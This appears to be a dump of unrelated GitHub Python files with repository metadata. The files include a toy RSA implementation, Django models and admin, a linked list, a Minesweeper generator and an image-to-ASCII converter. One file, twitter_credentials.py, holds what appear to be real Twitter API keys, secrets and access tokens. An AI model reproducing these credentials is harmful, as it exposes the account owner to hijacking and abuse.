print "\t\t\033[1;31;0m[-]The number %d can be divided by \033[1;37;0m%d" % (num, small_prime)
return False
return True
def getst1(self, n):
if n % 2 == 0:
self.count += 1
return self.getst1(n / 2)
else:
return self.count, n
def generate_b(self, b, n):
if euclid(b, n) > 1:
b = random.randint(2, n - 2)
return self.generate_b(b, n)
else:
return b
def miller_rabin_test(self, n):
index = 1
self.count = 0
s, t = self.getst1(n - 1)
while index <= 5:
b = self.generate_b(random.randint(2, n - 2), n)
print "\t\t\t{0}'s test, b is {1}".format(index, b)
j = 0
try:
r = math.pow(b, t) % n
except OverflowError:
print "\t\t\tThe number is too big.But we can use another method!"
r = ModExp(b, t, n)
if r == 1 or r == n - 1:
pass
else:
while j < s:
j += 1
r = (r * r) % n
if r == n - 1:
break
if s == j:
return False
index += 1
print "\t\t[+]Miller rabin test passed!The fake's passing rate is {0}".format(1 / float(math.pow(4, 5)))
return True
def primes_test(self, num):
print "\t\t[*]Primes test begin."
if self.small_primes_test(num):
print "\t\t[+]Small primes test passed."
else:
return False
if num > 361:
print "\t\t[*]Miller rabin test begin."
if self.miller_rabin_test(num):
return True
else:
return False
return True
def produce_prime1(self, num, start, end):
print "\t[+]The number of test is %d" % num
if self.primes_test(num):
return num
else:
num += 2
if num > end:
num = end - num + start
return self.produce_prime1(num, start, end)
def produce_prime(self, start, end):
p = produce_odd(start, end)
return self.produce_prime1(p, start, end)
def generate_key(self):
print "[*]First prime is producing" + "." * 100
p1 = self.produce_prime(2 ** 6, 2 ** 7)
print "\t[*]The first prime is %d" % p1
print "[*]Second prime is producing" + "." * 100
p2 = self.produce_prime(2 ** 14, 2 ** 15)
print "\t[*]The second prime is %d" % p2
n = p1 * p2
yn = (p1 - 1) * (p2 - 1)
if yn % self.e == 0:
print "\033[1;31;0m[-]Error! Bat n!"
self.generate_key()
return
print "[*]d is producing" + "." * 100
E = Euclid(self.e, yn)
d = E.method1()
if d < 0:
d = d + yn
print "[*]d is: %d" % d
self.pk = [n, self.e]
print "[*]pk is:",
print self.pk
self.sk = [n, d]
print "[*]sk is:",
print self.sk
def encrypt(self, m):
return ModExp(m, self.pk[1], self.pk[0])
def decrypt(self, c):
return ModExp(c, self.sk[1], self.sk[0])
if __name__ == "__main__":
k = 12
m = 2103157897831904071864395721267
y = 446615800949186291810252513371
for i in range(100000000, 200000000):
if y == ModExp(k, i, m):
print "x is :" + str(i)
| [
"365078225@qq.com"
] | 365078225@qq.com |
5ada8331b1e26070ab3d970c083a01aa1ae12d41 | 0f3940f9d8315aa732fc1561b62846daad875ede | /home/admin.py | 0253c0c742fd89ecc52146c27b5d191f6b292b3f | [] | no_license | gokhalevedant06/MoneyManager | 922722aa998ac8370b25f9e99a7fede9306a7a97 | 2b0c8419732582ce4341e6f5a2d0b7b145ffb6ec | refs/heads/master | 2023-07-11T03:02:35.848301 | 2021-08-04T13:41:39 | 2021-08-04T13:41:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | from django.contrib import admin
from .models import *
# Register your models here.
@admin.register(Choice)
class ChoiceAdmin(admin.ModelAdmin):
list_display = [
'field',
'value'
]
list_display_links = [
'value'
]
admin.site.register(UserInfo)
| [
"mitrajeetgolsangi@gmail.com"
] | mitrajeetgolsangi@gmail.com |
47261b4e4d07ae44fd014d90a146656008612d6a | 775ecc1b24e6039199d4a1ea83088f81f36da3b7 | /lbs5.py | 2377fa53fa53de37990c8468c73a27c35bda1b98 | [] | no_license | arjunreddy8296217721/02royalmechd12018 | 7fd387524c9c8fd22255853d2cb87d57ade1801a | 5e928c90e06eff4a79cc81914e77c21a2f3fd94b | refs/heads/master | 2020-03-27T21:55:53.378310 | 2018-11-16T06:46:47 | 2018-11-16T06:46:47 | 147,187,993 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 66 | py | a=1
while a<=5:
print(a)
a=a+1
a=5
while a>=1:
print(a)
a=a-1
| [
"noreply@github.com"
] | noreply@github.com |
1a73540dab8856cd097f7a39a0b4a2a1fb617497 | 2ab6a480af8d6111fc01ffd4f76f72f4dbfa4f72 | /AI_hw2/AI_hw/gernerator.py | 1c8394bde0daee765d6269dac6466dd8194f1518 | [] | no_license | KaivinC/AI_hw2 | f6ed857bb06e442990b20c94cfd00243bbe98715 | e06a7c85e3ca82c291bef3b2c16c4a57be63e91a | refs/heads/master | 2022-04-26T20:24:14.697723 | 2020-05-01T12:42:31 | 2020-05-01T12:42:31 | 260,440,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,011 | py | import random
import time
# It makes me easier to get neighbors
neighbor = [(-1, -1), (-1, 0), (-1, 1), (0, -1),
(0, 1), (1, -1), (1, 0), (1, 1)]
def Neighbor(BoardSize, x, y):
'''
To get the list of neighbor
'''
Neighbor_List = []
for (dx, dy) in neighbor:
if (x + dx < 0 or x + dx >= BoardSize[0] or
y + dy < 0 or y + dy >= BoardSize[1]):
continue
Neighbor_List.append((x+dx, y+dy))
return Neighbor_List
def make_question(BoardSize, num_mines, num_Hint):
ans = [[None for j in range(BoardSize[1])]for i in range(BoardSize[0])]
for _ in range(num_mines):
i = random.randint(0, BoardSize[0]-1)
j = random.randint(0, BoardSize[1]-1)
while ans[i][j] is not None:
i = random.randint(0, BoardSize[0]-1)
j = random.randint(0, BoardSize[1]-1)
ans[i][j] = 'X'
N = Neighbor(BoardSize, i, j)
random.shuffle(N)
for (Nx, Ny) in N:
if ans[Nx][Ny] is None:
ans[Nx][Ny] = 'Hint'
num_Hint -= 1
break
if ans[Nx][Ny] == 'Hint':
break
for i in range(BoardSize[0]):
for j in range(BoardSize[1]):
if ans[i][j] is None:
BREAK = False
for (Nx, Ny) in Neighbor(BoardSize, i, j):
if ans[Nx][Ny] is not None:
BREAK = True
break
if BREAK:
continue
ans[i][j] = 'Hint'
num_Hint -= 1
for _ in range(num_Hint):
i = random.randint(0, BoardSize[0]-1)
j = random.randint(0, BoardSize[1]-1)
while ans[i][j] is not None:
i = random.randint(0, BoardSize[0]-1)
j = random.randint(0, BoardSize[1]-1)
ans[i][j] = 'Hint'
for i in range(BoardSize[0]):
for j in range(BoardSize[1]):
if ans[i][j] == 'Hint':
ans[i][j] = 0
for (Nx, Ny) in Neighbor(BoardSize, i, j):
if ans[Nx][Ny] == 'X':
ans[i][j] += 1
Q = [[None for j in range(BoardSize[1])]for i in range(BoardSize[0])]
for i in range(BoardSize[0]):
for j in range(BoardSize[1]):
if type(ans[i][j]) == int:
Q[i][j] = ans[i][j]
else:
Q[i][j] = -1
return Q, ans
def check(BoardSize, num_mines, MAP):
CountTotal = 0
for i in range(BoardSize[0]):
for j in range(BoardSize[1]):
if MAP[i][j] == 'X':
CountTotal += 1
if type(MAP[i][j]) == int:
Count = 0
for (Nx, Ny) in Neighbor(BoardSize, i, j):
if MAP[Nx][Ny] == 'X':
Count += 1
if Count != MAP[i][j]:
return False
if CountTotal == num_mines:
return True
else:
return False | [
"noreply@github.com"
] | noreply@github.com |
df6bb199aa33221b02a071eebb1a06018e2600d3 | e35fd52fe4367320024a26f2ee357755b5d5f4bd | /Chapter 3 - Stacks and Queues/linkedlist.py | b949d5439e2e9c0378f1d78a0e7ded42d00de4ba | [] | no_license | liseyko/CtCI | a451967b0a0ce108c491d30b81e88d20ad84d2cd | c27f19fac14b4acef8c631ad5569e1a5c29e9e1f | refs/heads/master | 2020-03-21T14:28:47.621481 | 2019-11-12T22:59:07 | 2019-11-12T22:59:07 | 138,658,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,690 | py | from random import randint
class Node():
"""implementation of a simple Node object"""
def __init__(self,data=None,next=None):
self.next = next
self.data = data
def __str__(self):
return str(self.data)
class LinkedList():
"""linked list implementation"""
def __init__(self,lst=[]):
self.head = None
self.len = 0
for n in reversed(lst):
self.insert(n)
def insert(self,data):
self.head = Node(data,self.head)
self.len += 1
def populate(self,q=10, rng=16):
while self.len < q:
self.insert(randint(0,rng))
def append(self,data):
if self.head is None:
self.head = Node(data)
return
end = Node(data)
n = self.head
while n.next is not None:
n = n.next
n.next = end
self.len += 1
def deleteNode(self,n):
cn = self.head
if not cn:
return False
while cn.next:
if cn.next == n:
cn.next = cn.next.next
return True
cn = cn.next
return False
def deleteNode_fast(self,n):
if not n:
return False
if not n.next:
return self.deleteNode(n)
n.data = n.next.data
n.next = n.next.next
return True
def mkunique(self):
buffer = set()
n = self.head
if n:
buffer.add(n.data)
else:
return
while n.next:
if n.next.data not in buffer:
buffer.add(n.next.data)
n = n.next
else:
n.next = n.next.next
self.len -= 1
def print_data(self):
n=self.head
while n:
print(n.data,end=', ')
n = n.next
print(n)
if not self.head:
print("The list is empty.")
def __str__(self):
l = []
n=self.head
while n:
l.append(n.data)
n = n.next
return str(l)
def __iter__(self):
cur_node = self.head
while cur_node:
yield cur_node
cur_node = cur_node.next
def __len__(self):
return self.len
def deleteNodeByData(self, data):
""" deletes the first occurance of node, containing <data> from <head> list """
if self.head.data == data:
self.head = self.head.next
return
n = self.head
while n.next is not None:
if n.next.data == data:
n.next = n.next.next
return self
n = n.next
return
| [
"liseyko@gmail.com"
] | liseyko@gmail.com |
3826faedb660a17079a1d293a80165218ad8d2a1 | f8457d2ef0c0c84591e95d42fc3ab942d238cfed | /twitter_credentials.py | 8b554f293ae68b08a44bfe19bcdd1ff7bad47c60 | [] | no_license | Datalker/Tweet2SQLite | 9f3bad0ca996252d48cd77fa086d52236d5fb0ac | cc5105144486c3555b350ee311412dbbab31342d | refs/heads/master | 2021-01-10T18:01:33.752398 | 2016-03-19T19:45:22 | 2016-03-19T19:45:22 | 54,283,917 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | consumer_key = 'ZVuGbFzFcgktLeXbaQmlDTO0j'
consumer_secret = 'CONT2Mai0DuBfrOSVHVriYxKkODyX7eVxeV6w60LHFKJSERwU2'
access_token = '4865838237-hAp9s69ti8pmLCA0K2WU5lOgzrt0lWP4Q0nhiav'
access_token_secret = 'HP1xwOePTTDqd4Rrcg0VZSgusudt7YNYJAIhmVVFxTuKX'
| [
"e.arnautov@gmail.com"
] | e.arnautov@gmail.com |
62047532182c60dbc9e4704fc63c57e2cbd5d85b | 7106efbc2e61d82454a6418a40a3c3eb548008f5 | /ascii.py | d74ac79ec1057002773364d31811082caf61c173 | [] | no_license | JunchengL/Picture-to-character-painting_Python | a8251d8ac92c01696887f27709f22a01367d12e7 | c6840734f656377139288efd86f93f520263204e | refs/heads/master | 2020-05-16T14:05:54.959080 | 2019-04-23T21:13:25 | 2019-04-23T21:13:25 | 183,092,875 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,294 | py | # -*- coding: utf-8 -*-
from PIL import Image
import argparse
# First, build a command line input handler the ArgumentParser instance.
parser = argparse.ArgumentParser()
# Define the width and height of the input file, output file, and output character
parser.add_argument('file') #Input File
parser.add_argument('-o', '--output') #Output File
parser.add_argument('--width', type = int, default = 80) #Output character width
parser.add_argument('--height', type = int, default = 80) #Output character height
# Parse and get parameters
args = parser.parse_args()
# Input image file path
IMG = args.file
# Output character width
WIDTH = args.width
# Output character height
HEIGHT = args.height
# Output path
OUTPUT = args.output
ascii_char = list("$@B%8&WM#*oahkbdpqwmZO0QLCJUYXzcvunxrjft/\|()1{}[]?-_+~<>i!lI;:,\"^`'. ")
def get_char(r,g,b,alpha = 256):
# Judge alpha value
if alpha == 0:
return ' '
# Get the length of the character set, here is 70
length = len(ascii_char)
# Convert RGB values to grayscale gray, with grayscale values ranging from 0-255
gray = int(0.2126 * r + 0.7152 * g + 0.0722 * b)
# Gray value range is 0-255, while character set is only 70
# Need to do the following to map the gray value to the specified character
unit = (256.0 + 1)/length
# Returns the character corresponding to the gray value
return ascii_char[int(gray/unit)]
if __name__ == '__main__':
# Open and adjust the width and height of the image
im = Image.open(IMG)
im = im.resize((WIDTH,HEIGHT), Image.NEAREST)
# Initialize the output string
txt = ""
# Traverse each line in the picture
for i in range(HEIGHT):
# Traversing each column in the row
for j in range(WIDTH):
# Convert RGB pixels of (j,i) coordinates to characters and add them to txt string
txt += get_char(*im.getpixel((j,i)))
# Need to add a newline after traversing a line
txt += '\n'
# Print to screen
print(txt)
# Output to file
if OUTPUT:
with open(OUTPUT,'w') as f:
f.write(txt)
else:
with open("output.txt",'w') as f:
f.write(txt)
| [
"juncheng.liu@outlook.com"
] | juncheng.liu@outlook.com |
e043899f8799a5dd3ba3ad36a0203ce5913e99fa | 38e5f0a750b36ea9c945ddc6b36cc9571d3016c5 | /DS.py | 611359ab73a154a69e9bc2d710782bf413465194 | [] | no_license | TahirT/DS_1920_Gr25 | 5ad5221724c587ea182e860212d883f8d3a3d49b | e817f5c81e4f75c2fe4d09c5b8c581871a76b095 | refs/heads/master | 2021-03-04T05:24:14.351244 | 2020-06-07T00:25:23 | 2020-06-07T00:25:23 | 246,010,312 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 949 | py | import Four_square_cipher
import Vigenere
import sys
import Case
import Create_user
import Export_Key
def Provo():
zgjedhja = input("Deshiron te provoshe perser(PO/JO):")
if zgjedhja.upper() == "PO":
main()
else:
print("----Procesi perfundoi-----")
def main():
print("Sheno cilin fajll do te ekzekutosh: ")
sys.argv = input("vendos emrin e fajllit:").upper()
if sys.argv == "VIGENERE" :
Vigenere.main()
Provo()
elif sys.argv == "FOUR_SQUARE_CIPHER":
Four_square_cipher.main()
Provo()
elif sys.argv.upper() == "CREATE_USER":
Create_user.main()
Provo()
elif sys.argv.upper() == "EXPORT_KEY":
Export_Key.main()
Provo()
elif sys.argv == "CASE":
Case.main()
Provo()
else:
print("Vendos vlera valide ")
main()
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | noreply@github.com |
263b2d55833a4529dbba4267d5bc84ae71a6716b | 4ffe8c7c314db4a063ef9725264700389155ad08 | /learn_seaborn.py | c1da3ca05377d5bf8739fda3909cd1f9d7c62a4f | [] | no_license | gudengxia/TestOfPQFizz | f3f2ac1bbae75743af891a8a7282e9516529c52d | cb7f60ebf9a62bcfed72b7a5ae37fba71490fec5 | refs/heads/master | 2023-01-14T13:22:52.758299 | 2020-11-16T03:47:11 | 2020-11-16T03:47:11 | 297,596,208 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 479 | py | import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
#sns.set()
#plt.figure()
#sb.set_style('white')
#sb.barplot(x=x,y=y,data=dataset)
#plt.savefig('test.png')
#df = pd.read_csv('akcn.csv')
df = pd.read_csv('output.csv')
#df = pd.concat([df1, df2], ignore_index=True)
#print(df)
xx = [i for i in range(21)]
#g = sns.relplot(x=xx, y='mean', kind='line', data=df[3,7])
#g.fig.autofmt_xdate()
ax = sns.lineplot(data=[df['mean-1'], df['mean-2']])
plt.show()
| [
"gudengxia@foxmail.com"
] | gudengxia@foxmail.com |
cfc1266530244f99a0aa98f70cd55a93e6f8f402 | c3f4aecdd52fa918e40262f20dc97dbe061039ab | /chapter02/hello_world_003.py | 08b99cb179a7e11f38417f6baaff87460a4dc3e5 | [] | no_license | arisskz6/learnPython | 247452d4367d7e07e3d23bd2c7bd50e599e11870 | 017121e8c0e91c4598427a24612f639f7e3ed3c8 | refs/heads/master | 2023-02-12T21:47:47.426296 | 2021-01-14T08:28:36 | 2021-01-14T08:28:36 | 318,468,562 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | #!/usr/bin/env python3
mesage = "Hello Python Crash Course reader!"
print(mesage)
| [
"arisstz6@gmail.com"
] | arisstz6@gmail.com |
52e1e482c2162cf3c59307ede3a5faa860f7d0fe | 69c92d6528468365c8130257146dda0448992b34 | /shortener/models.py | a617d60bd88120e03a1c7881a9999e6ef2db0a07 | [] | no_license | bhNibir/urlShortener | 5287a75ea055be82711402c345a632d113c69ab3 | 3c8139b3c702ee8ec3516d2f73b8b0bd606626d7 | refs/heads/master | 2020-05-18T00:43:27.717768 | 2019-04-29T12:57:19 | 2019-04-29T12:57:19 | 184,070,794 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 270 | py | from django.db import models
# Create your models here.
class ShortenUrl(models.Model):
url = models.URLField()
short_url = models.CharField(max_length=255, primary_key=True)
add_date = models.DateTimeField()
def __str__(self):
return self.url
| [
"biplob.asanibir@gmail.com"
] | biplob.asanibir@gmail.com |
01ef0c75377ed76b68f6d5dd96805ee796ebea24 | 6c0167de6f58f6f281bbe866c02b74d253e72da7 | /genetic-testing/wackopicko/sqli_reflected/wpmock.py | 9f3ece82cda86eb971b8dff85484bf632ebebcce | [] | no_license | S0U1SB4N3/beagle | ed6111873ec25d44d24941a0b65bb6200607e361 | 7f52475ff66509ea2f6b984c3c755cd72713734f | refs/heads/master | 2021-09-28T02:42:35.322134 | 2018-11-13T14:03:08 | 2018-11-13T14:03:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,737 | py | import re
class WackoPickoXssReflected:
"""
/**/*.php 3
/index.php 2
/users/login.php 1
"""
current_page = "/index.php"
focus = "" # Focused element
payload = ""
base = 10
# Useful fields
fields = {
"search": "",
"picname": "",
"username": "",
}
_get = {
"search": "",
"picname": "",
"username": "",
}
def best_base(self, page):
if page == "/users/login.php":
self.base = 1
elif page == "/index.php":
if self.base > 1:
self.base = 2
else:
if self.base > 1:
self.base = 2
def switch_page(self, page):
self._get = self.fields
self.fields = {
"search": "",
"picname": "",
"username": "",
}
self.best_base(page)
self.current_page = page
def perform(self, action):
cat = action[0]
if cat == "click":
self.click(action[1][0], action[1][1])
elif cat == "type":
self.type(action[1])
else:
pass
def click(self, x, y):
self.focus = ""
# Click on WackoPicko.com
if (y < 40):
self.switch_page("/index.php")
# Click on Header (any page)
elif (40 <= y < 90):
# Click on home
if (0 <= x < 50):
self.switch_page("/users/home.php")
elif (50 <= x < 100):
self.switch_page("/pictures/upload.php")
elif (100 <= x < 150):
self.switch_page("/pictures/recent.php")
elif (150 <= x < 190):
self.switch_page("/guestbook.php")
elif (190 <= x < 260):
self.switch_page("/users/login.php")
else:
pass
elif (80 <= y < 120):
if (0 <= x < 150):
pass
elif (150 <= x < 200):
self.focus = "searchfield"
# Click on submit
elif (200 <= x < 250):
if self.fields['search'] != "":
self.switch_page("/pictures/search.php")
self.fields['search'] = self._get['search']
if self.current_page == "/users/login.php":
if (150 <= y < 200):
if (30 <= x < 180):
self.focus = "username"
elif (200 <= y < 250):
if (30 <= x < 180):
if self.payload == "":
self.payload = self.fields['username']
"""
if self.current_page == "/index.php":
# Click on Page Content
if (150 <= y < 151):
if (0 <= x < 150):
self.switch_page("/users/register.php")
elif (151 <= y < 152):
if (0 <= x < 150):
self.switch_page("/users/sample.php")
elif (152 <= y < 153):
if (0 <= x < 150):
self.switch_page("/calendar.php")
elif (153 <= y < 154):
if (0 <= x < 50):
self.switch_page("/error.php")
# Click on filename field
elif (154 <= y < 200):
if (50 <= x < 100):
self.focus = "filefield"
# Click on submit button
elif (200 <= y < 250):
if (50 <= x < 100):
if self.fields['picname'] != "":
self.switch_page("/piccheck.php")
"""
def type(self, string):
if self.focus == "username":
self.fields['username'] = string
| [
"info@none.org"
] | info@none.org |
5f8310c28b3faf567c45612da76c07359c89c3b8 | e503aff4954d3a2d23a8b35a13055b71dfe9b2bb | /apps/users/models.py | 6cc43f8aef9f37d062de5fa778dee8c3db4165aa | [] | no_license | llzz-code/guliedu | 8dbf7736b7c66a7370f2c496aa04f5bc228ff618 | 65ef8123666fc50d03227183f848a712aae75742 | refs/heads/master | 2023-04-23T03:16:33.556364 | 2021-05-06T14:01:08 | 2021-05-06T14:01:08 | 364,911,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,476 | py | from datetime import datetime
from django.db import models
from django.contrib.auth.models import AbstractUser
# Create your models here.
class UserProfile(AbstractUser):
image = models.ImageField(upload_to='user/', max_length=200, verbose_name='用户头像',
null=True, blank=True)
nick_name = models.CharField(max_length=20, verbose_name='用户昵称',
null=True, blank=True)
birthday = models.DateField(verbose_name='用户生日',
null=True, blank=True)
gender = models.CharField(choices=(('girl', '女'), ('boy', '男')), max_length=10, verbose_name='性别',
default='girl')
address = models.CharField(max_length=100, verbose_name='用户地址',
null=True, blank=True)
phone = models.CharField(max_length=11, verbose_name='用户手机',
null=True, blank=True)
is_start = models.BooleanField(default=False, verbose_name='是否激活')
add_time = models.DateTimeField(default=datetime.now, verbose_name='添加时间')
def __str__(self):
return self.username
def get_msg_counter(self):
from operations.models import UserMessage
counter = UserMessage.objects.filter(message_man=self.id, message_status=False).count()
return counter
class Meta:
verbose_name = verbose_name_plural = '用户信息'
class BannerInfo(models.Model):
image = models.ImageField(upload_to='banner/', verbose_name='轮播图', max_length=200)
url = models.URLField(default='http://www.atguigu.com', verbose_name='图片链接', max_length=200)
add_time = models.DateTimeField(default=datetime.now, verbose_name='添加时间')
def __str__(self):
return str(self.image)
class Meta:
verbose_name_plural = verbose_name = '轮播图'
class EmailVerifyCode(models.Model):
code = models.CharField(max_length=50, verbose_name='邮箱验证码')
email = models.EmailField(max_length=200, verbose_name='验证码邮箱')
send_type = models.IntegerField(choices=((1, 'register'), (2, 'forget'), (3, 'change')), verbose_name='验证类型')
add_time = models.DateTimeField(default=datetime.now, verbose_name='添加时间')
def __str__(self):
return str(self.code)
class Meta:
verbose_name_plural = verbose_name = '邮箱验证码' | [
"220038123@qq.com"
] | 220038123@qq.com |
4dcd98965902046d08fe0ec9b6ba5083c262834f | 4cd32e547501354579cc5d9e3e51c2b0909aeeb9 | /django_number_place/project/wsgi.py | e4b9070482b55349b12d6a5e50e3d6587c0d41a7 | [
"BSD-2-Clause"
] | permissive | shun-tucorin/django_number_place | a48afc9bd81073a615a80e453a38bbe928a62bed | ab7bdbe565db99aedd54c5ef9ae7a73e71cb28d1 | refs/heads/master | 2021-06-24T12:33:35.229727 | 2020-08-15T04:58:38 | 2020-08-15T04:58:38 | 187,583,061 | 0 | 0 | BSD-2-Clause | 2020-08-15T04:58:39 | 2019-05-20T06:47:11 | Python | UTF-8 | Python | false | false | 444 | py | # coding: utf-8
"""
WSGI config for django_project project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault(
'DJANGO_SETTINGS_MODULE',
'django_number_place.project.settings'
)
application = get_wsgi_application()
| [
"shun@tucorin.com"
] | shun@tucorin.com |
bbb7b44037265955881795a78d55ac9943a28368 | 77eeea2381bef9e7b24cbe8c5b86943a97f6a8a4 | /1) перменные , типы, преобразование/b) преобразование.py | 46a735fc6e114bb345e943d1c550d9600f3b09ca | [] | no_license | librabrain/geekbrains | 4102dab703bbd817910c2bd3d4c1e4fac6c9b866 | d4b3b4e34baf7eefe63762e0015035530eca221c | refs/heads/master | 2020-06-19T03:02:48.635375 | 2019-08-15T19:19:07 | 2019-08-15T19:19:07 | 196,540,918 | 0 | 0 | null | 2019-08-08T14:29:17 | 2019-07-12T08:31:53 | Python | UTF-8 | Python | false | false | 582 | py | # цифра 1988 преобразовалась в строку за счёт ковычек! была int, стала str
birthday_year = '1988'
print(type(birthday_year))
period = 20
print(type(period))
# преобразовали переменную "birthday_year" в цифру
age = int(birthday_year) + period
print(age)
# складывание двух строк является - конкатенацией. пример, но сначала преобразовываем число "period" в строку
some_str = birthday_year + str(period)
print(some_str)
| [
"azat.znahar@yandex.ru"
] | azat.znahar@yandex.ru |
3ec670a221bf562518bbc440d17e1db559a4596f | 908a4dc5ffb3fdad014e483df88f6573d54ceb06 | /object_test.py | b8d17d4cb7b2d14bf34143250a643d4f648e29b8 | [] | no_license | CullenDolan/supergrid | d702bdcc94746fe2de9c8b0be782da0e9ddc2fbf | a791b7fa48928e264ef4d2bdc1fe0f0963944fdb | refs/heads/main | 2023-03-31T14:56:58.440336 | 2021-04-07T14:55:56 | 2021-04-07T14:55:56 | 334,480,937 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,244 | py | from datetime import datetime
class location:
def __init__(self, loc_id, hospital, building, floor, pod, room, created_at, updated_at):
self.loc_id = loc_id
self.hospital = hospital
self.building = building
self.floor = floor
self.pod = pod
self.room = room
self.created_at = datetime.now()
self.updated_at = updated_at
loc1 = location(1, 'LURIE', 'MAIN', 12, 'A', 120, datetime.now(), 'NULL')
loc2 = location(2, 'LURIE', 'C-D', 3, 'C', 10, datetime.now(), 'NULL')
print(loc1)
print(loc1.building)
print(loc2.created_at)
class resource:
def __init__(self, user_id, hospital, deptartment, division, f_name, m_initial, l_name, email, created_at):
self.user_id = user_id
self.hospital = hospital
self.deptartment = deptartment
self.division = division
self.epic_id = epic_id
self.npi = npi
self.f_name = f_name
self.m_initial = m_initial
self.l_name = l_name
self.email = email
self.created_at = datetime.now()
user1 = resource(1, 'LURIE', 'PEDIATRICS', 'CARDIOLOGY', 'CULLEN', 'B', 'DOLAN', 'cullen@gmail.com', datetime.now())
user2 = resource(2, 'LURIE', 'SURGERY', 'NEUROSURGERY', 'EMILY', 'K', 'RYAN', 'emily@gmail.com', datetime.now())
print(user1.division) | [
"cullen.dolan@gmail.com"
] | cullen.dolan@gmail.com |
6e18893137c3c85ef8e273ad56b8170fbe604a00 | e2b9873da7723ef8ae505c4286e4eccbf7416315 | /leagueofclass/cadastros/migrations/0013_remove_atividadesprofessor_teste.py | aca869bbd971ba5dda0a5981a69d7e9f85b5439c | [] | no_license | lucaasaragao/LOC_PAS | 94fc50dd429ce2e9ec71cebdd748f3ff9df1ceac | 22939ab9f7b54ddc6355dce11e55e801e9501327 | refs/heads/master | 2020-03-27T17:57:57.824525 | 2018-11-01T05:22:20 | 2018-11-01T05:22:20 | 146,888,554 | 0 | 1 | null | 2018-10-31T21:37:59 | 2018-08-31T12:23:48 | CSS | UTF-8 | Python | false | false | 349 | py | # Generated by Django 2.0.7 on 2018-09-28 04:37
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('cadastros', '0012_atividadesprofessor_teste'),
]
operations = [
migrations.RemoveField(
model_name='atividadesprofessor',
name='teste',
),
]
| [
"osvaldo_cavalcanti_filho@hotmail.com"
] | osvaldo_cavalcanti_filho@hotmail.com |
949a40f08219de6af67b53382126fda378d6d49a | 118a9f667f9b588128543a3004fe2a5a96800c77 | /data_initializer/stations.py | 7fb10d50691f55e6515b940429950c906fbb6c38 | [
"MIT"
] | permissive | hemu243/ev-charging-station | 976815cb5fdce28213628eddfda880fcdeaa71c7 | 25f34a4e8fc886c9504235af1a69cbfcb57acf73 | refs/heads/master | 2020-03-11T05:06:11.637883 | 2018-04-17T00:11:40 | 2018-04-17T00:11:40 | 129,793,429 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,506 | py | import os
from data_initializer import SingletonClass, csv_reader
class Stations(object):
"""
A class which hold existing stations information like address, latitude and longitude etc..
"""
FUEL_TYPE = "Fuel Type Code"
STREET = "Street Address"
CITY = "City"
STATE = "State"
ZIP = "ZIP"
LAT = "Latitude"
LONG = "Longitude"
FULL_ADDRESS = "Full Address"
def __init__(self):
"""
Initialized existing gas or EV stations
"""
current_path = os.path.abspath(os.path.dirname(__file__))
singleton_csv_reader = SingletonClass(csv_reader.CSVReader)
self.resource_folder = os.path.join(current_path, "..", "resources")
# Store csv reader reference
self.csv_reader_instance = singleton_csv_reader(os.path.join(self.resource_folder, "alt_fuel_stations.csv"))
self.simplified_csv = []
self.fields_to_save = [Stations.FUEL_TYPE, Stations.STREET, Stations.CITY,
Stations.STATE, Stations.ZIP, Stations.LONG, Stations.LAT]
def simplified_data(self):
"""
Read csv data and simplified as well for better usages
:return: list of simplified data
"""
self.csv_reader_instance.read_csv()
for cdata in self.csv_reader_instance.csv_data:
data = {}
for field in self.fields_to_save:
data[field] = cdata[field]
full_address = "{0} {1} {2} {3}".format(data[Stations.STREET], data[Stations.CITY],
data[Stations.STATE], data[Stations.ZIP])
data[Stations.FULL_ADDRESS] = full_address
self.simplified_csv.append(data)
return self.simplified_csv
| [
"hchoudhary@splunk.com"
] | hchoudhary@splunk.com |
5a7ce41b86192e873f4f74e36bf5cb0aca5edb9f | 599529d4f64f35a6248f64473121d61d05c1ef8e | /linkloving_product_multi_selection/controllers/controllers.py | 08f8d8b7e11b2aa8d6ac656df80b30592f9e2a6d | [] | no_license | iverson2937/linklovingaddons | 2670ad16297abfbc94c883afc65b4f2082e7df0c | eea92d44bee76053619be00aa601b1efc4249589 | refs/heads/master | 2021-01-13T09:44:33.002594 | 2017-04-06T07:07:25 | 2017-04-06T07:07:25 | 72,824,679 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,101 | py | # -*- coding: utf-8 -*-
from odoo import http
# class LinklovingProductMultiSelection(http.Controller):
# @http.route('/linkloving_product_multi_selection/linkloving_product_multi_selection/', auth='public')
# def index(self, **kw):
# return "Hello, world"
# @http.route('/linkloving_product_multi_selection/linkloving_product_multi_selection/objects/', auth='public')
# def list(self, **kw):
# return http.request.render('linkloving_product_multi_selection.listing', {
# 'root': '/linkloving_product_multi_selection/linkloving_product_multi_selection',
# 'objects': http.request.env['linkloving_product_multi_selection.linkloving_product_multi_selection'].search([]),
# })
# @http.route('/linkloving_product_multi_selection/linkloving_product_multi_selection/objects/<model("linkloving_product_multi_selection.linkloving_product_multi_selection"):obj>/', auth='public')
# def object(self, obj, **kw):
# return http.request.render('linkloving_product_multi_selection.object', {
# 'object': obj
# }) | [
"357346640@qq.com"
] | 357346640@qq.com |
